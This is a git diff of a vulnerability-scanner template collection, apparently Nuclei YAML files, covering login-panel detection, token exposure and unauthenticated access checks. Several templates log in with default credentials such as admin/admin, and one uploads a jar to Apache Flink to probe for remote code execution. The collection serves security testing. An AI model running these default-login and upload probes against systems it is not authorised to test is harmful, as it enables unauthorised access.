CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Sign In - Airflow" + tags: airflow,default-login,apache + requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} + - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -21,12 +30,14 @@ requests: Referer: {{BaseURL}}/admin/airflow/login username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + attack: pitchfork payloads: username: - airflow password: - airflow + cookie-reuse: true extractors: - type: regex @@ -35,6 +46,7 @@ requests: internal: true regex: - 'type="hidden" value="(.*?)">' + req-condition: true matchers-condition: and matchers: @@ -44,6 +56,9 @@ requests: - 'contains(all_headers_2, "session=.")' - 'status_code_2 == 302' condition: and + - type: word words: - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/alibaba-mongoshake-unauth-268.yaml b/poc/auth/alibaba-mongoshake-unauth-268.yaml new file mode 100644 index 0000000000..6de46b6ec7 --- /dev/null +++ b/poc/auth/alibaba-mongoshake-unauth-268.yaml @@ -0,0 +1,27 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/poc/auth/alibaba-mongoshake-unauth-270.yaml b/poc/auth/alibaba-mongoshake-unauth-270.yaml index 6de46b6ec7..5d0b6ed712 100644 --- a/poc/auth/alibaba-mongoshake-unauth-270.yaml +++ b/poc/auth/alibaba-mongoshake-unauth-270.yaml @@ -4,19 +4,21 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth + metadata: + max-request: 1 + tags: mongoshake,unauth,alibaba,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}/' matchers-condition: and matchers: - - type: word words: - '{"Uri":"/worker","Method":"GET"}' + - type: word words: - 'text/plain' @@ -25,3 +27,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100df73190b4cb70a8ce254319365eb46566529f720568dd75e7c78ef98947776d602201c21217186da8ecab8fb38921f040a238ce5817e862ef108277fdfd8e53e7b52:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/alphaweb-default-login-275.yaml b/poc/auth/alphaweb-default-login-275.yaml new file mode 100644 index 0000000000..869a4c5e99 --- /dev/null +++ b/poc/auth/alphaweb-default-login-275.yaml @@ -0,0 +1,45 @@ +id: alphaweb-default-login + +info: + name: AlphaWeb XE Default Login + author: Lark Lab + severity: medium + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + metadata: + max-request: 1 + tags: default-login,AlphaWeb + +http: + - raw: + - | + GET /php/node_info.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - admin + password: + - alphaadmin + + matchers-condition: and + matchers: + - type: word + words: + - "HW Configuration" + - "SW Configuration" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502210080a7d0d439f7e264df521b6308a0d61542b820625bcbe63314ae03972557e78f0220423baa99c7183bd5fb04cf0836c8b20297cfc13a18243846832520c8dd91e477:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/alphaweb-default-login-277.yaml b/poc/auth/alphaweb-default-login-277.yaml index 6532087439..6a48f18c6e 100644 --- a/poc/auth/alphaweb-default-login-277.yaml +++ b/poc/auth/alphaweb-default-login-277.yaml @@ -4,8 +4,14 @@ info: name: AlphaWeb XE Default Login author: Lark Lab severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: default-login,AlphaWeb requests: - raw: @@ -32,4 +38,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/amazon-mws-auth-token-11845.yaml b/poc/auth/amazon-mws-auth-token-11845.yaml deleted file mode 100644 index 8ed5b31604..0000000000 --- a/poc/auth/amazon-mws-auth-token-11845.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: amazon-mws-auth-token-value - -info: - name: Amazon MWS Authentication Token - Detect - author: gaurang - severity: medium - description: Amazon MWS authentication token was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - tags: token,file,amazon,auth -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100a22e9ab4357449ff0b0d0e1d56fd2a2a815900eb260c13cdc8ca5b4904508d76022030e701c98fff70a3c0e8174fe27c30c87c60b0a4acdc97555a71970ab6e5e83a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/amazon-mws-auth-token-283.yaml b/poc/auth/amazon-mws-auth-token-283.yaml index 28e8063f5e..457df905b0 100644 --- a/poc/auth/amazon-mws-auth-token-283.yaml +++ b/poc/auth/amazon-mws-auth-token-283.yaml @@ -1,15 +1,22 @@ id: amazon-mws-auth-token + info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - tags: exposure,token,aws -requests: + metadata: + max-request: 1 + tags: exposure,token,aws,amazon,auth + +http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/amazon-mws-auth-token.yaml b/poc/auth/amazon-mws-auth-token.yaml new file mode 100644 index 0000000000..0ab5703b9c --- /dev/null +++ b/poc/auth/amazon-mws-auth-token.yaml @@ -0,0 +1,16 @@ +id: amazon-mws-auth-token-value + +info: + name: Amazon MWS Auth Token + author: gaurang + severity: medium + tags: token,file,amazon,auth + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/poc/auth/ambari-default-login-287.yaml b/poc/auth/ambari-default-login-287.yaml new file mode 100644 index 0000000000..7d9efa4734 --- /dev/null +++ b/poc/auth/ambari-default-login-287.yaml @@ -0,0 +1,35 @@ +id: ambari-default-login + +info: + name: Apache Ambari Default Login + author: pdteam + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ambari,default-login,apache + +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/ambari-default-login-289.yaml b/poc/auth/ambari-default-login-289.yaml index b23093118b..fb1f8c826a 100644 --- a/poc/auth/ambari-default-login-289.yaml +++ b/poc/auth/ambari-default-login-289.yaml @@ -11,14 +11,17 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 tags: ambari,default-login,apache -requests: +http: - raw: - | GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + payloads: username: - admin @@ -32,4 +35,4 @@ requests: - 'AMBARI.' condition: and -# Enhanced by mp on 2022/03/22 +# digest: 4b0a00483046022100e8ce7a0930ecfa4469f6955f0ac7532e7c5916c23f65b8e2362b2ffa026dd214022100e0e265ba7f30ed085fb6966bb1aff6bd07b3e8265c3d3f645a56510f797e731e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ambari-default-login-290.yaml b/poc/auth/ambari-default-login-290.yaml index 7d9efa4734..e251839b56 100644 --- a/poc/auth/ambari-default-login-290.yaml +++ b/poc/auth/ambari-default-login-290.yaml @@ -3,14 +3,7 @@ id: ambari-default-login info: name: Apache Ambari Default Login author: pdteam - description: An Apache Ambari default admin login was discovered. - severity: high - reference: - - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + severity: medium tags: ambari,default-login,apache requests: @@ -31,5 +24,3 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/amcrest-login-296.yaml b/poc/auth/amcrest-login-296.yaml new file mode 100644 index 0000000000..7455bbce1f --- /dev/null +++ b/poc/auth/amcrest-login-296.yaml @@ -0,0 +1,37 @@ +id: amcrest-login + +info: + name: Amcrest Login + author: DhiyaneshDK + description: An Amcrest LDAP user login was discovered. + severity: info + reference: + - https://www.exploit-db.com/ghdb/7273 + metadata: + shodan-query: html:"amcrest" + google-dork: intext:"amcrest" "LDAP User" + tags: panel,camera,amcrest + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Amcrest Technologies" + - "LDAPUser" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/amcrest-login-297.yaml b/poc/auth/amcrest-login-297.yaml deleted file mode 100644 index 19837aca9a..0000000000 --- a/poc/auth/amcrest-login-297.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: amcrest-login - -info: - name: Amcrest Login - author: DhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7273 - metadata: - shodan-query: html:"amcrest" - google-dork: intext:"amcrest" "LDAP User" - tags: panel,camera,amcrest - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "Amcrest Technologies" - - "LDAPUser" - condition: and - - - type: status - status: - - 200 diff --git a/poc/auth/amcrest-login.yaml b/poc/auth/amcrest-login.yaml index 1de1e908d0..19837aca9a 100644 --- a/poc/auth/amcrest-login.yaml +++ b/poc/auth/amcrest-login.yaml @@ -4,18 +4,13 @@ info: name: Amcrest Login author: DhiyaneshDK severity: info - description: An Amcrest LDAP user login was discovered. - reference: - - https://www.exploit-db.com/ghdb/7273 - classification: - cwe-id: CWE-200 + reference: https://www.exploit-db.com/ghdb/7273 metadata: - max-request: 1 shodan-query: html:"amcrest" - google-query: intext:"amcrest" "LDAP User" - tags: panel,camera,amcrest,edb + google-dork: intext:"amcrest" "LDAP User" + tags: panel,camera,amcrest -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -31,5 +26,3 @@ http: - type: status status: - 200 - -# digest: 490a00463044022050eac2812667f0e3defe0f97e1bd3991203a79b9dc370304351c0a0ad2d7eb4b022060109c9084ff759b6d34391c1a71450ab133f6019097833595dd9805da1fb8be:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ametys-admin-login-300.yaml b/poc/auth/ametys-admin-login-300.yaml deleted file mode 100644 index 7a96ee1ada..0000000000 --- a/poc/auth/ametys-admin-login-300.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: ametys-admin-login - -info: - name: Ametys Admin Login Panel - author: pathtaga - severity: info - description: An Ametys admin login panel was discovered. - tags: panel,ametys,cms - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/_admin/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ametys - Log in' - - '' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' - -# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/ametys-admin-login-301.yaml b/poc/auth/ametys-admin-login-301.yaml new file mode 100644 index 0000000000..532dd02cda --- /dev/null +++ b/poc/auth/ametys-admin-login-301.yaml @@ -0,0 +1,31 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login + author: pathtaga + severity: info + tags: panel,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' \ No newline at end of file diff --git a/poc/auth/ametys-admin-login.yaml b/poc/auth/ametys-admin-login.yaml index 532dd02cda..7a96ee1ada 100644 --- a/poc/auth/ametys-admin-login.yaml +++ b/poc/auth/ametys-admin-login.yaml @@ -1,10 +1,16 @@ id: ametys-admin-login info: - name: Ametys Admin Login + name: Ametys Admin Login Panel author: pathtaga severity: info + description: An Ametys admin login panel was discovered. tags: panel,ametys,cms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -28,4 +34,6 @@ requests: part: body group: 1 regex: - - ' ([0-9.]+)' \ No newline at end of file + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/apache-flink-unauth-rce-355.yaml b/poc/auth/apache-flink-unauth-rce-355.yaml index 196536f66e..dbae4dd542 100644 --- a/poc/auth/apache-flink-unauth-rce-355.yaml +++ b/poc/auth/apache-flink-unauth-rce-355.yaml @@ -1,14 +1,20 @@ id: apache-flink-unauth-rce + info: - name: Apache Flink Unauth RCE + name: Apache Flink - Remote Code Execution author: pikpikcu severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 + metadata: + max-request: 1 tags: apache,flink,rce,intrusive,unauth - reference: - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce -requests: + +http: - raw: - | POST /jars/upload HTTP/1.1 @@ -21,6 +27,7 @@ requests: {{randstr}} --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and matchers: - type: word @@ -28,12 +35,16 @@ requests: - "application/json" part: header condition: and + - type: word words: - "success" - "_poc.jar" part: body condition: and + - type: status status: - 200 + +# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apache-flink-unauth-rce-356.yaml b/poc/auth/apache-flink-unauth-rce-356.yaml new file mode 100644 index 0000000000..196536f66e --- /dev/null +++ b/poc/auth/apache-flink-unauth-rce-356.yaml @@ -0,0 +1,39 @@ +id: apache-flink-unauth-rce +info: + name: Apache Flink Unauth RCE + author: pikpikcu + severity: critical + tags: apache,flink,rce,intrusive,unauth + reference: + - https://www.exploit-db.com/exploits/48978 + - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 + - https://github.com/LandGrey/flink-unauth-rce +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/apache-storm-unauth.yaml b/poc/auth/apache-storm-unauth.yaml index 2a2c45e566..dc48849fe9 100644 --- a/poc/auth/apache-storm-unauth.yaml +++ b/poc/auth/apache-storm-unauth.yaml @@ -1,14 +1,20 @@ id: apache-storm-unauth + info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html + reference: + - https://storm.apache.org/releases/current/STORM-UI-REST-API.html + metadata: + max-request: 1 tags: apache,unauth,misconfig -requests: + +http: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' + matchers-condition: and matchers: - type: word @@ -17,6 +23,9 @@ requests: - '"totalMem":' - '"stormVersion":' condition: and + - type: status status: - 200 + +# digest: 490a0046304402206445294e1d237514858065f44d0ca332874876a4071b4163c436a74f803abb6c022066822b6f0d9f4fa25b39da6bec4db4aef6067a7a6d78391697a8022dc4131691:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apc-ups-login-381.yaml b/poc/auth/apc-ups-login-381.yaml index bb5b0730f8..f28e384f2c 100644 --- a/poc/auth/apc-ups-login-381.yaml +++ b/poc/auth/apc-ups-login-381.yaml @@ -1,20 +1,13 @@ id: apc-ups-login info: - name: APC UPS Login - Detect + name: APC UPS Login author: droberson severity: info - description: APC UPS panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: title:"APC | Log On" + reference: https://www.shodan.io/search?query=title%3A%22APC+%7C+Log+On%22 tags: iot,panel -http: +requests: - method: GET path: - "{{BaseURL}}/logon.htm" @@ -29,5 +22,3 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205da82c9d57d3d08507d0ad710c327f7b96877a56b8fd6821e5300942ce071fdd022028cc8e18ec271a2a0b591529944e329e95e63b2204d3bc2b3047a891ab17b30e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apc-ups-login-382.yaml b/poc/auth/apc-ups-login.yaml similarity index 100% rename from poc/auth/apc-ups-login-382.yaml rename to poc/auth/apc-ups-login.yaml diff --git a/poc/auth/api-onelogin-472.yaml b/poc/auth/api-onelogin-472.yaml deleted file mode 100644 index 1a1de60b69..0000000000 --- a/poc/auth/api-onelogin-472.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: api-onelogin - -info: - name: OneLogin API Test - author: dwisiswant0 - severity: info - reference: - - https://developers.onelogin.com/api-docs/2/getting-started/dev-overview - metadata: - max-request: 2 - tags: token-spray,onelogin - -self-contained: true - -http: - - method: GET - path: - - "https://api.us.onelogin.com/api/2/apps" - - "https://api.eu.onelogin.com/api/2/apps" - - headers: - Authorization: Bearer {{token}} - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - '"id":' - - '"connector_id":' - - '"auth_method":' - condition: and - -# digest: 4b0a00483046022100c863b1c5238bae97a22123c1fbcc2dffca09b867f1799b647646ae4ecc1fa317022100e9d0e913bb9c5089ceb35ecb0caa5f24a658dbd956febbb59d91a64027c9c728:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/api-onelogin.yaml b/poc/auth/api-onelogin.yaml new file mode 100644 index 0000000000..d8369ad80b --- /dev/null +++ b/poc/auth/api-onelogin.yaml @@ -0,0 +1,27 @@ +id: api-onelogin + +info: + name: OneLogin API Test + author: dwisiswant0 + severity: info + reference: https://developers.onelogin.com/api-docs/2/getting-started/dev-overview + tags: token-spray,onelogin + +self-contained: true +requests: + - method: GET + path: + - "https://api.us.onelogin.com/api/2/apps" + - "https://api.eu.onelogin.com/api/2/apps" + headers: + Authorization: Bearer {{token}} + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - '"id":' + - '"connector_id":' + - '"auth_method":' + condition: and diff --git a/poc/auth/apisix-default-login-490.yaml b/poc/auth/apisix-default-login-490.yaml index cb4e83e6df..87b1b252e0 100644 --- a/poc/auth/apisix-default-login-490.yaml +++ b/poc/auth/apisix-default-login-490.yaml @@ -5,19 +5,20 @@ info: author: pdteam severity: high description: An Apache Apisix default admin login was discovered. - metadata: - shodan-query: title:"Apache APISIX Dashboard" - fofa-query: title="Apache APISIX Dashboard" - product: https://apisix.apache.org reference: - https://apisix.apache.org/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + max-request: 1 + product: https://apisix.apache.org + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" tags: apisix,apache,default-login -requests: +http: - raw: - | POST /apisix/admin/user/login HTTP/1.1 @@ -48,4 +49,4 @@ requests: - '"code":0' condition: and -# Enhanced by mp on 2022/03/22 +# digest: 4a0a00473045022100ed7246599d057edeb05c9cbb8f8e6e646ecd8f30c16f824b8fcd3fdb7fc0a4700220730ebc8209a21fced7ba192032e7731959b3eb50f22441f85ac5b3ef82e97e48:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apisix-default-login-491.yaml b/poc/auth/apisix-default-login-491.yaml new file mode 100644 index 0000000000..d89104b847 --- /dev/null +++ b/poc/auth/apisix-default-login-491.yaml @@ -0,0 +1,51 @@ +id: apisix-default-login + +info: + name: Apache Apisix Default Admin Login + author: pdteam + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Apache APISIX Dashboard" + fofa-query: title="Apache APISIX Dashboard" + product: https://apisix.apache.org + tags: apisix,apache,default-login + +requests: + - raw: + - | + POST /apisix/admin/user/login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Authorization: + Content-Type: application/json;charset=UTF-8 + + {"username":"{{user}}","password":"{{pass}}"} + + attack: pitchfork + payloads: + user: + - admin + pass: + - admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"data"' + - '"token"' + - '"code":0' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/apollo-default-login-520.yaml b/poc/auth/apollo-default-login-520.yaml index c9e119d097..f671e7631e 100644 --- a/poc/auth/apollo-default-login-520.yaml +++ b/poc/auth/apollo-default-login-520.yaml @@ -5,14 +5,14 @@ info: author: PaperPen severity: high description: An Apollo default login was discovered. + metadata: + shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - shodan-query: http.favicon.hash:11794165 tags: apollo,default-login requests: diff --git a/poc/auth/apple-app-site-association-524.yaml b/poc/auth/apple-app-site-association-524.yaml new file mode 100644 index 0000000000..9954c8d681 --- /dev/null +++ b/poc/auth/apple-app-site-association-524.yaml @@ -0,0 +1,34 @@ +id: apple-app-site-association + +info: + name: Apple app site association for harvesting end points + author: panch0r3d + severity: info + tags: misc + +requests: + - method: GET + path: + - "{{BaseURL}}/.well-known/apple-app-site-association" + - "{{BaseURL}}/well-known/apple-app-site-association" + - "{{BaseURL}}/apple-app-site-association" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - 'applinks' + - 'appID' + - 'paths' + part: body + condition: and + + - type: word + words: + - 'application/json' + part: header + + - type: status + status: + - 200 diff --git a/poc/auth/apple-app-site-association-525.yaml b/poc/auth/apple-app-site-association-525.yaml index 53fd428289..5e3aa3c443 100644 --- a/poc/auth/apple-app-site-association-525.yaml +++ b/poc/auth/apple-app-site-association-525.yaml @@ -4,7 +4,6 @@ info: name: Apple app site association for harvesting end points author: panch0r3d severity: info - tags: misc,apple requests: - method: GET @@ -12,23 +11,16 @@ requests: - "{{BaseURL}}/.well-known/apple-app-site-association" - "{{BaseURL}}/well-known/apple-app-site-association" - "{{BaseURL}}/apple-app-site-association" - - stop-at-first-match: true + redirects: true + max-redirects: 2 + headers: + User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" matchers-condition: and matchers: - - type: word + - type: regex + regex: + - '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)' part: body - words: - - 'applinks' - - 'appID' - - 'paths' - condition: and - - - type: word - part: header - words: - - 'application/json' - - type: status status: - 200 diff --git a/poc/auth/apple-app-site-association-526.yaml b/poc/auth/apple-app-site-association-526.yaml index 9954c8d681..f8e92c7804 100644 --- a/poc/auth/apple-app-site-association-526.yaml +++ b/poc/auth/apple-app-site-association-526.yaml @@ -13,7 +13,9 @@ requests: - "{{BaseURL}}/well-known/apple-app-site-association" - "{{BaseURL}}/apple-app-site-association" - stop-at-first-match: true + redirects: true + max-redirects: 1 + matchers-condition: and matchers: - type: word diff --git a/poc/auth/argocd-login.yaml b/poc/auth/argocd-login.yaml deleted file mode 100644 index 07b34bdba3..0000000000 --- a/poc/auth/argocd-login.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: argocd-detect - -info: - name: Argo CD Detect - author: Adam Crosser - severity: info - description: Detects the Argo CD website console - tags: tech,argocd - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: body - words: - - 'Argo CD' \ No newline at end of file diff --git a/poc/auth/arl-default-password.yaml b/poc/auth/arl-default-password.yaml index d1be4b04a1..08f426e7da 100644 --- a/poc/auth/arl-default-password.yaml +++ b/poc/auth/arl-default-password.yaml @@ -1,9 +1,11 @@ id: arl-default-password + info: name: ARL Default Password author: pikpikcu severity: high tags: arl,default-login + requests: - method: POST path: @@ -12,8 +14,10 @@ requests: Content-Type: application/json; charset=UTF-8 body: | {"username":"admin","password":"arlpass"} + matchers-condition: and matchers: + - type: word words: - '"message": "success"' diff --git a/poc/auth/atvise-login-590.yaml b/poc/auth/atvise-login-590.yaml index ebc1df47af..bc58bf1715 100644 --- a/poc/auth/atvise-login-590.yaml +++ b/poc/auth/atvise-login-590.yaml @@ -1,13 +1,15 @@ id: atvise-login info: - name: Atvise Login panel + name: Atvise Login Panel author: idealphase severity: info - description: atvise is leading visualization and control center solutions based on pure web technology + description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. reference: - https://www.exploit-db.com/ghdb/7837 - https://www.atvise.com/en + classification: + cwe-id: CWE-200 metadata: google-dork: intitle:"atvise - next generation" tags: panel,atvise @@ -27,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/avatier-password-management.yaml b/poc/auth/avatier-password-management-604.yaml similarity index 100% rename from poc/auth/avatier-password-management.yaml rename to poc/auth/avatier-password-management-604.yaml diff --git a/poc/auth/avatier-password-management-605.yaml b/poc/auth/avatier-password-management-605.yaml index 49cd4c37ae..a543fb4a68 100644 --- a/poc/auth/avatier-password-management-605.yaml +++ b/poc/auth/avatier-password-management-605.yaml @@ -11,16 +11,18 @@ info: classification: cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.favicon.hash:983734701 - tags: panel,avatier,aims + tags: edb,panel,avatier,aims -requests: +http: - method: GET path: - '{{BaseURL}}/aims/ps/' - redirects: true + host-redirects: true max-redirects: 2 + matchers-condition: or matchers: - type: word @@ -34,4 +36,4 @@ requests: words: - 'Password Management Client' -# Enhanced by mp on 2022/03/20 +# digest: 4b0a00483046022100e1eacbb28776488dbae4033987f670b282631746a55dd5e2b3ad8002791b3ce4022100bb3bacf8ae87c87dfc04779d72c3bba1f605196dd7d9b6b698360853ad8d3c61:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aws-opensearch-login-649.yaml b/poc/auth/aws-opensearch-login-649.yaml new file mode 100644 index 0000000000..ffd32b7e76 --- /dev/null +++ b/poc/auth/aws-opensearch-login-649.yaml @@ -0,0 +1,24 @@ +id: aws-opensearch-login + +info: + name: AWS OpenSearch Default Login + author: Higor Melgaço (eremit4) + severity: medium + description: Searches for the AWS OpenSearch login page + reference: https://aws.amazon.com/pt/blogs/opensource/introducing-opensearch/ + tags: panel,opensearch,aws + +requests: 